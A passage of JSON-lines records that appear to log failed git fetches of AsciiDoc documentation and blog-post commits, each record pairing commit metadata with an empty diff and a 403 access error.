README\n","repos":"pjanouch\/hex","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/hex.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"e343ff90b075ad71174d0c1d3d7f95a1f579180d","subject":"Update 2015-09-23-Garbage-Collection.adoc","message":"Update 2015-09-23-Garbage-Collection.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-23-Garbage-Collection.adoc","new_file":"_posts\/2015-09-23-Garbage-Collection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7b059c493770379ec8f17581593e3ef312448d3","subject":"Update 2019-03-10-And-thats-an-Email.adoc","message":"Update 
2019-03-10-And-thats-an-Email.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2019-03-10-And-thats-an-Email.adoc","new_file":"_posts\/2019-03-10-And-thats-an-Email.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a356230f6950956debc7ee1c9d949e1eb2af7ceb","subject":"doc(CHANGELOG): init file","message":"doc(CHANGELOG): init file\n","repos":"Git-Host\/Git-Host.io,TheAshwanik\/new,TheAshwanik\/new,alchapone\/alchapone.github.io,TheAshwanik\/new,Git-Host\/Git-Host.io,anthonny\/dev.hubpress.io,lametaweb\/lametaweb.github.io,demo-hubpress\/demo-hubpress.github.io,anthonny\/dev.hubpress.io,alchapone\/alchapone.github.io,demo-hubpress\/demo-hubpress.github.io,demo-hubpress\/demo-hubpress.github.io,lametaweb\/lametaweb.github.io,demo-hubpress\/demo-hubpress.github.io,anthonny\/dev.hubpress.io,demo-hubpress\/demo-hubpress.github.io,TheAshwanik\/new,anthonny\/dev.hubpress.io,Git-Host\/Git-Host.io,anthonny\/dev.hubpress.io,lametaweb\/lametaweb.github.io,alchapone\/alchapone.github.io","old_file":"docs\/CHANGELOG.adoc","new_file":"docs\/CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/demo-hubpress\/demo-hubpress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a0638826cbd006c081992ee3e1a9b511d2c928ca","subject":"Update 2016-09-24-Pumpkin-Smoothie-Jar.adoc","message":"Update 2016-09-24-Pumpkin-Smoothie-Jar.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2016-09-24-Pumpkin-Smoothie-Jar.adoc","new_file":"_posts\/2016-09-24-Pumpkin-Smoothie-Jar.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f27f9848bb56a4215ca57c72acdad85b02bdc3db","subject":"Update 2017-07-10-Azure-Functions-with.adoc","message":"Update 2017-07-10-Azure-Functions-with.adoc","repos":"dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io","old_file":"_posts\/2017-07-10-Azure-Functions-with.adoc","new_file":"_posts\/2017-07-10-Azure-Functions-with.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dannylane\/dannylane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36b71d2c5a6833da27db8c23be5180faaaad04ab","subject":"[website] broken link to an adoc","message":"[website] broken link to an adoc\n\nChange-Id: I8fe88073807eceb8927d6ca7ddf109bd0a9fd9d3\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4504\nReviewed-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nTested-by: Kudu 
Jenkins\n","repos":"andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0177dd262167e2fda3661e80b00beaaa1237f3db","subject":"Added Threading Model to Docs","message":"Added Threading Model to Docs\n","repos":"davidkarlsen\/camel,apache\/camel,cunningt\/camel,ullgren\/camel,Fabryprog\/camel,pax95\/camel,tdiesler\/camel,cunningt\/camel,ullgren\/camel,christophd\/camel,objectiser\/camel,pax95\/camel,pax95\/camel,onders86\/camel,tdiesler\/camel,alvinkwekel\/camel,kevinearls\/camel,adessaigne\/camel,ullgren\/camel,nicolaferraro\/camel,mcollovati\/camel,onders86\/camel,CodeSmell\/camel,punkhorn\/camel-upstream,nikhilvibhav\/camel,christophd\/camel,adessaigne\/camel,objectiser\/camel,gnodet\/camel,mcollovati\/camel,adessaigne\/camel,tdiesler\/camel,tadayosi\/camel,zregvart\/camel,pax95\/camel,christophd\/camel,tadayosi\/camel,tdiesler\/camel,kevinearls\/camel,kevinearls\/camel,objectiser\/camel,apache\/camel,kevinearls\/camel,pmoerenhout\/camel,tadayosi\/camel,tadayosi\/camel,cunningt\/camel,pmoerenhout\/camel,DariusX\/camel,onders86\/camel,christophd\/camel,Fabryprog\/camel,DariusX\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,alvinkwekel\/camel,christophd\/camel,nicolaferraro\/camel,gnodet\/camel,Fabryprog\/camel,kevinearls\/camel,cunningt\/camel,pmoerenhout\/camel,tadayosi\/camel,Fabryprog\/camel,alvinkwekel\/camel,apache\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,onders86\/camel,DariusX\/camel,mcollovati\/camel,adessaigne\/camel,davidkarlsen\/camel,zregvart\/camel,DariusX\/camel,nikhilvibhav\/camel,gnodet\/camel,mcollovati\/camel,CodeSmell\/camel,nicolaferraro\/camel,ullgren\/camel,pax95\/camel,gnodet\/camel,apache\/camel,kevinearls\/camel,tdiesler\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,onders86\/camel,onders86\/camel,apache\/camel,tdiesler\/camel,cunningt\/camel,davidkarlsen\/camel,gnodet\/camel,cunningt\/camel,adessaigne\/camel,punkhorn\/camel-upstream,tadayosi\/camel,christophd\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,CodeSmell\/camel,apache\/camel,zregvart\/camel,adessaigne\/camel,CodeSmell\/camel,nicolaferraro\/camel,pax95\/camel,zregvart\/camel,objectiser\/camel,pmoerenhout\/camel","old_file":"docs\/user-manual\/en\/threading-model.adoc","new_file":"docs\/user-manual\/en\/threading-model.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bea9d90b9e39fd9f9cf9ffe8ec5a1cc7a8a0e733","subject":"y2b create post OtterBox Defender iPad 3 Case 
Unboxing (The New iPad Case)","message":"y2b create post OtterBox Defender iPad 3 Case Unboxing (The New iPad Case)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-03-26-OtterBox-Defender-iPad-3-Case-Unboxing-The-New-iPad-Case.adoc","new_file":"_posts\/2012-03-26-OtterBox-Defender-iPad-3-Case-Unboxing-The-New-iPad-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1314851196db469d1c31503e7ca4e042530da550","subject":"create post OnePlus 5T Limited Edition Unboxing + Easter Egg","message":"create post OnePlus 5T Limited Edition Unboxing + Easter Egg","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-OnePlus-5T-Limited-Edition-Unboxing-+-Easter-Egg.adoc","new_file":"_posts\/2018-02-26-OnePlus-5T-Limited-Edition-Unboxing-+-Easter-Egg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f75c28b34c18401c0162e42a3885913d6e45ce4f","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/showdown.asciidoc","new_file":"_brainstorms\/showdown.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1cc2c445f7b8d04d386b9cd78a40ba3074aa325f","subject":"Adding Spring Rest Docs","message":"Adding Spring Rest Docs\n\nFixes #15\n","repos":"rajadileepkolli\/POC,rajadileepkolli\/POC,rajadileepkolli\/POC,rajadileepkolli\/POC","old_file":"spring-boot-rest\/poc-spring-boot-rest-application\/src\/main\/asciidoc\/index.adoc","new_file":"spring-boot-rest\/poc-spring-boot-rest-application\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rajadileepkolli\/POC.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f158ab62a331105eef6ab1fd035061a4a5d2f8dc","subject":"DELTASPIKE-807 - Update external resources","message":"DELTASPIKE-807 - Update external 
resources\n","repos":"Danny02\/deltaspike,tremes\/deltaspike,danielsoro\/deltaspike,mlachat\/deltaspike,subaochen\/deltaspike,chkal\/deltaspike,struberg\/deltaspike,rdicroce\/deltaspike,chkal\/deltaspike,os890\/deltaspike-vote,os890\/DS_Discuss,chkal\/deltaspike,apache\/deltaspike,danielsoro\/deltaspike,Danny02\/deltaspike,mlachat\/deltaspike,tremes\/deltaspike,subaochen\/deltaspike,os890\/deltaspike-vote,Danny02\/deltaspike,danielsoro\/deltaspike,os890\/DS_Discuss,os890\/deltaspike-vote,Danny02\/deltaspike,idontgotit\/deltaspike,mlachat\/deltaspike,idontgotit\/deltaspike,tremes\/deltaspike,danielsoro\/deltaspike,struberg\/deltaspike,apache\/deltaspike,tremes\/deltaspike,rdicroce\/deltaspike,idontgotit\/deltaspike,os890\/deltaspike-vote,struberg\/deltaspike,idontgotit\/deltaspike,subaochen\/deltaspike,subaochen\/deltaspike,mlachat\/deltaspike,apache\/deltaspike,rdicroce\/deltaspike,struberg\/deltaspike,apache\/deltaspike,rdicroce\/deltaspike,chkal\/deltaspike,os890\/DS_Discuss,os890\/DS_Discuss","old_file":"site\/src\/main\/asciidoc\/external.adoc","new_file":"site\/src\/main\/asciidoc\/external.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Danny02\/deltaspike.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e3a7c05cdbe2c0b0f5c2b5096200b03499eb348","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"marbon87\/spring-cloud-config,marbon87\/spring-cloud-config,spring-cloud\/spring-cloud-config,spring-cloud\/spring-cloud-config,marbon87\/spring-cloud-config,spring-cloud\/spring-cloud-config","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-config.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"90d63bae03405fd18e057a06447a1b55a914e276","subject":"Update 2015-11-11-Migrate-blog-from-wordpress-to-gihubp-pages-with-hubpress.adoc","message":"Update 2015-11-11-Migrate-blog-from-wordpress-to-gihubp-pages-with-hubpress.adoc","repos":"javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io","old_file":"_posts\/2015-11-11-Migrate-blog-from-wordpress-to-gihubp-pages-with-hubpress.adoc","new_file":"_posts\/2015-11-11-Migrate-blog-from-wordpress-to-gihubp-pages-with-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javathought\/javathought.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b61e7e6534453c0ab1881d28e6401d9dbda6e27a","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"9fa6c9ecdf5f722eb574affbee86f7374ed95f1f","subject":"Update 2016-12-23-TEMPLATE.adoc","message":"Update 2016-12-23-TEMPLATE.adoc","repos":"iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io","old_file":"_posts\/2016-12-23-TEMPLATE.adoc","new_file":"_posts\/2016-12-23-TEMPLATE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iamthinkking\/iamthinkking.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e798a173221f105122c3c3a375d0f8afabb52732","subject":"Delete 2018-01-20-Bitrise.adoc","message":"Delete 2018-01-20-Bitrise.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-20-Bitrise.adoc","new_file":"_posts\/2018-01-20-Bitrise.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6746adff7b98f814e402a85ef2d2603c8d46df2a","subject":"Update 2018-11-11-Vuejs-3.adoc","message":"Update 2018-11-11-Vuejs-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44c5b9c0626b48a51aa74a46da392ce8b3fdc0fe","subject":"Create 2015-01-15-forge-2.13.1.final.asciidoc","message":"Create 2015-01-15-forge-2.13.1.final.asciidoc","repos":"luiz158\/docs,agoncal\/docs,forge\/docs,forge\/docs,luiz158\/docs,addonis1990\/docs,addonis1990\/docs,agoncal\/docs","old_file":"news\/2015-01-15-forge-2.13.1.final.asciidoc","new_file":"news\/2015-01-15-forge-2.13.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e0f03a02f3ad6729bf7f5a7bf892abd39ec23106","subject":"Update 2018-02-09-Getting-started-to-develop-on-IOTA.adoc","message":"Update 2018-02-09-Getting-started-to-develop-on-IOTA.adoc","repos":"cmolitor\/blog,cmolitor\/blog,cmolitor\/blog,cmolitor\/blog","old_file":"_posts\/2018-02-09-Getting-started-to-develop-on-IOTA.adoc","new_file":"_posts\/2018-02-09-Getting-started-to-develop-on-IOTA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmolitor\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3de45231a16bc15a699ce8ff56d22d247a0ce12","subject":"Renamed '_posts\/2019-06-31-Kafka-integration-tests.adoc' to '_posts\/2019-07-3-Kafka-integration-tests.adoc'","message":"Renamed '_posts\/2019-06-31-Kafka-integration-tests.adoc' to 
'_posts\/2019-07-3-Kafka-integration-tests.adoc'","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2019-07-3-Kafka-integration-tests.adoc","new_file":"_posts\/2019-07-3-Kafka-integration-tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65a970b441f3411b4323df2e11b0e5a1710fc087","subject":"Common help with Grails","message":"Common help with Grails\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-helpWithGrails.adoc","new_file":"src\/main\/docs\/common-helpWithGrails.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"741389153f5ba3509738feff98246999cbc9dacc","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"M3lkior\/gravitee-management-webui,lauthieb\/gravitee-management-webui,lauthieb\/gravitee-management-webui,gravitee-io\/gravitee-management-webui,gravitee-io\/gravitee-management-webui,gravitee-io\/gravitee-management-webui,lauthieb\/gravitee-management-webui,M3lkior\/gravitee-management-webui","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/M3lkior\/gravitee-management-webui.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6827a463e21f2df943e4fc62c14367bececa8602","subject":"y2b create post Asus Eee Pad Transformer Unboxing \\u0026 Overview","message":"y2b create post Asus Eee Pad Transformer Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-11-Asus-Eee-Pad-Transformer-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-08-11-Asus-Eee-Pad-Transformer-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e83b871d018cd1b7df69f135872e8c54006b014","subject":"Refs Objs interf","message":"Refs Objs interf\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Objects & interfaces\/README.adoc","new_file":"Objects & interfaces\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e8d4a092b8477fb2c432493e93a62a3c9345a7d","subject":"Update 2016-02-12-The-start.adoc","message":"Update 
2016-02-12-The-start.adoc","repos":"jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io","old_file":"_posts\/2016-02-12-The-start.adoc","new_file":"_posts\/2016-02-12-The-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jblemee\/jblemee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ffd5c787b302545404a176a190f22f52afe09c8","subject":"Added links to api doc","message":"Added links to api doc\n","repos":"michel-kraemer\/web-site,michel-kraemer\/web-site,michel-kraemer\/web-site,kevinbayes\/vertx-web-site,woorea\/vertx-web-site,vert-x3\/vertx-web-site,kevinbayes\/vertx-web-site,cazacugmihai\/vertx-web-site,vietj\/vertx,karianna\/vertx-web-site,cescoffier\/web-site,woorea\/vertx-web-site,vietj\/vertx,cazacugmihai\/vertx-web-site,vert-x3\/vertx-web-site,karianna\/vertx-web-site,karianna\/vertx-web-site,vert-x3\/vertx-web-site,kevinbayes\/vertx-web-site,vietj\/vertx,woorea\/vertx-web-site,cescoffier\/web-site,cazacugmihai\/vertx-web-site,cescoffier\/web-site","old_file":"src\/main\/asciidoc\/manual.adoc","new_file":"src\/main\/asciidoc\/manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vert-x3\/vertx-web-site.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"73507cb5e3d1c8d6ad1e712050f66cb5452d7aef","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44e584d75eb21b980a753ca4b2156fa70b5c635e","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd9d8939ca158bbf18e85f000a54a9dc44846d40","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be8441f131fc4bdfab629e399b9b3a491ed27810","subject":"Update 2017-10-09-Azure-7.adoc","message":"Update 
2017-10-09-Azure-7.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-09-Azure-7.adoc","new_file":"_posts\/2017-10-09-Azure-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80637149a5de96b8c0021a48dbe090243dfd511c","subject":"Update 2018-11-08-develop.adoc","message":"Update 2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8db4f19c8c4b878b342c74e2d7e1126d26092850","subject":"Add Changelog","message":"Add Changelog\n","repos":"zhangwei0181\/ldap-passwd-webui,jirutka\/change-password","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jirutka\/change-password.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ae0635e0ec65b5a8e76d408481c01c4d3519ece","subject":"Update docs","message":"Update docs\n","repos":"laosdirg\/base,laosdirg\/base,laosdirg\/base","old_file":"docs\/docker.asciidoc","new_file":"docs\/docker.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/laosdirg\/base.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"199fce7b30b2d17289d78fd614d57f85c27ba7d4","subject":"Added warning on cosineSimilarity() for situations when the calculation should not be used. (#423)","message":"Added warning on cosineSimilarity() for situations when the calculation should not be used. 
(#423)\n\n","repos":"inserpio\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures","old_file":"docs\/similarity.adoc","new_file":"docs\/similarity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/larusba\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"828c85fdb3d7e70ab3c44e47c6db013e93cd50ce","subject":"Update Asciidoctor.adoc","message":"Update Asciidoctor.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Asciidoctor.adoc","new_file":"Linux\/Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25d1b1ad464445dff41640f5f72528a2c8653744","subject":"CL: merging paths","message":"CL: merging paths\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5f1dcaddcc61b22cf39dfa373931693e5be7913c","subject":"Remove redundant characters","message":"Remove redundant characters\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"543d28cf5171a9476a54ab40b42c6429d3356b97","subject":"refactor: better wording","message":"refactor: better wording\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} 